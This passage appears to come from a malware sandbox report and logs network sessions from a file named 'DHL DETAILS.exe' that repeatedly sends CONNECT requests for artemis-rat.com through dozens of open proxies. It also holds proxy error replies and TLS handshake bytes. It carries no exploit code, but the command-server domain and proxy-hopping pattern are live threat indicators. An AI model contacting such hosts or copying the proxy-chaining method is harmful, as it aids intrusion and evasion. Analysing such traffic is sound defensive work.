Mar 9, 2024 13:14:14.235754967 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
482	192.168.2.5	50670	72.195.34.41	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.237626076 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
483	192.168.2.5	50780	162.240.72.139	37445	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.237719059 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.270730972 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.339454889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
484	192.168.2.5	50523	36.67.168.117	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.237786055 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.332437992 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
485	192.168.2.5	51486	8.222.239.209	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.237842083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.958105087 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
486	192.168.2.5	50759	162.241.6.97	59991	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.239249945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.270752907 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.339456081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:26.473784924 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
487	192.168.2.5	51529	72.195.34.58	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.241094112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
488	192.168.2.5	51532	174.77.111.198	49547	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.241631031 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
489	192.168.2.5	51020	117.160.250.163	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.242271900 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.269973993 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
490	192.168.2.5	51536	174.77.111.197	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.243057966 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
491	192.168.2.5	50584	94.131.203.7	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.245464087 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.270730972 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.339452028 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.526732922 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
492	192.168.2.5	50632	103.165.234.46	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.246464968 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.270760059 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.008538008 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
493	192.168.2.5	50686	163.172.147.89	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.250037909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.231750011 CET	729	IN	HTTP/1.0 501 Tor is not an HTTP Proxy Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00 Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
494	192.168.2.5	51566	5.161.231.34	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.250643015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.756007910 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:21 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
495	192.168.2.5	51527	211.222.252.187	8193	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.251074076 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
496	192.168.2.5	51541	211.222.252.187	8197	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.251463890 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
497	192.168.2.5	51485	116.199.168.1	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.252088070 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
498	192.168.2.5	51531	43.155.130.182	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.252173901 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
499	192.168.2.5	51540	213.202.230.241	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.252274036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.562633991 CET	76	IN	HTTP/1.0 200 Connection Established Proxy-agent: Apache/2.4.52 (Ubuntu)
Mar 9, 2024 13:14:14.563436031 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 95 f6 91 04 f6 09 8f de 0d 80 45 4a 45 29 70 b7 76 c2 ec e5 27 c9 eb e8 4c 85 77 10 4e 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eREJE)pv'LwN*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:14.878174067 CET	1286	IN	Data Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ec 52 96 82 16 6b 8c 9e ac 1a 25 16 25 5f 88 ef f8 4a ea af 92 e4 96 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00 Data Ascii: C?eRk%%_JDOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
Mar 9, 2024 13:14:14.878458977 CET	162	IN	Data Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7 Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5
Mar 9, 2024 13:14:14.878571033 CET	1286	IN	Data Raw: 7c f0 30 c1 81 dd bd 46 3c 84 41 91 c0 f9 72 70 be e9 27 7e 00 05 90 30 82 05 8c 30 82 03 74 a0 03 02 01 02 02 0d 02 03 bc 50 a3 27 53 f0 91 80 22 ed f1 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 Data Ascii: \|0F<Arp'~00tP'S"0*H0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R10200813000042Z270930000042Z0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P5
Mar 9, 2024 13:14:14.878593922 CET	1286	IN	Data Raw: 67 99 90 77 37 0a 97 2d c5 1c 1e f4 d0 5b e9 15 e3 ea 02 09 c8 13 d7 13 70 65 bf fb 88 9b 5a 25 be 77 09 e1 a7 6a 4e 11 75 b9 1e 4d f1 00 1b 6a 66 79 8e c3 6e d8 6d a2 22 a2 6d 05 fb 2c f2 f1 50 e5 a0 d1 d8 9f 35 7d fc 70 ab 59 2a 02 f1 be b0 d3 Data Ascii: gw7-[peZ%wjNuMjfynm"m,P5}pYj%[ @4 awHI)adcGF9sO+Xe Uon=zcmf0b0Jwl6!X0H0W10UBE10UGlobalS
Mar 9, 2024 13:14:14.878612041 CET	574	IN	Data Raw: 82 01 01 00 34 a4 1e b1 28 a3 d0 b4 76 17 a6 31 7a 21 e9 d1 52 3e c8 db 74 16 41 88 b8 3d 35 1d ed e4 ff 93 e1 5c 5f ab bb ea 7c cf db e4 0d d1 8b 57 f2 26 6f 5b be 17 46 68 94 37 6f 6b 7a c8 c0 18 37 fa 25 51 ac ec 68 bf b2 c8 49 fd 5a 9a ca 01 Data Ascii: 4(v1z!R>tA=5\_\|W&o[Fh7okz7%QhIZ#+IjuXHW5oo*Ni-h+s"7fIUg2&p=gm=\|42njoK;7D~lF!fUl)f[wIH(3rS5b$
Mar 9, 2024 13:14:14.890027046 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 09 8a 8a 50 76 1b 41 10 47 59 90 aa d7 f8 92 01 ab 65 30 75 6b 11 99 8a c9 f4 a7 5f 39 e6 bb 75 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 5f ec 9c e0 cd 44 f8 34 b3 ed 10 32 73 d0 29 44 25 4a c5 68 99 Data Ascii: %! PvAGYe0uk_9u(_D42s)D%JhRRI+
Mar 9, 2024 13:14:15.200460911 CET	258	IN	Data Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 ef f1 5c 83 12 d8 e4 38 e5 74 fc a1 e4 f1 c9 5b db 6c ab 47 35 3e 40 bb fc 14 a6 3c c3 c3 96 14 08 b0 d9 43 49 63 6a c0 cf ef 50 7e 90 8c 32 a7 ee ee 64 96 ab 5a 6c f8 b9 98 b6 97 6c df a7 9e 1d 13 3b Data Ascii: \8t[lG5>@<CIcjP~2dZll;/A]IC%jr* NGDc~UX\r5#?@lrDa+$^4@k ({,QI`X[
Mar 9, 2024 13:14:15.213326931 CET	252	OUT	Data Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 3e e3 c1 60 67 93 3f d4 29 1c 49 24 70 33 de 8d 2d 62 0d 3a d8 45 26 55 2b 60 49 22 38 83 e8 88 cc b7 ee 29 ab 2c 24 a9 9c 2c 29 f7 f0 d8 d8 d7 89 09 84 4c cd 5e 29 9f b3 42 74 db 30 9b e9 f9 41 ef 24 1c 06 Data Ascii: >`g?)I$p3-b:E&U+`I"8),$,)L^)Bt0A$03A(b@:]Y<@vk[TJRmG5>&8@R1`3"*L{HqgEAXu-$eX?zC4nr.l
Mar 9, 2024 13:14:15.529763937 CET	1286	IN	Data Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 65 39 1f 29 c7 93 b9 28 d2 53 7d a8 2a 15 70 2a 31 b9 cf da 53 7e 35 09 c0 9e 85 6d e0 2c b7 f1 58 ff a7 8c 4c 2f 1b c9 7f 6a 93 2c c6 a6 16 87 8e 3c 37 9a 92 d2 25 9c 37 d2 88 65 27 ae ff ca c4 5a 07 16 8f Data Ascii: qe9)(S}p1S~5m,XL/j,<7%7e'ZyC {v,@\hxpM>q@]?Erf0$f?wD,<4Mi%\hw)9JE>?Z!\i^n>! ~7"Q=bL

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
500	192.168.2.5	51525	45.120.178.197	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.252367020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
501	192.168.2.5	51550	107.181.148.227	6087	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.252425909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.656856060 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
502	192.168.2.5	51526	43.131.248.165	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.253145933 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
503	192.168.2.5	51545	136.243.82.121	1082	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.253317118 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.644308090 CET	84	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:14 GMT Transfer-Encoding: chunked

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
504	192.168.2.5	51538	150.109.243.156	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.254183054 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
505	192.168.2.5	51511	138.36.150.15	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.257644892 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
506	192.168.2.5	51530	185.81.153.162	3389	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
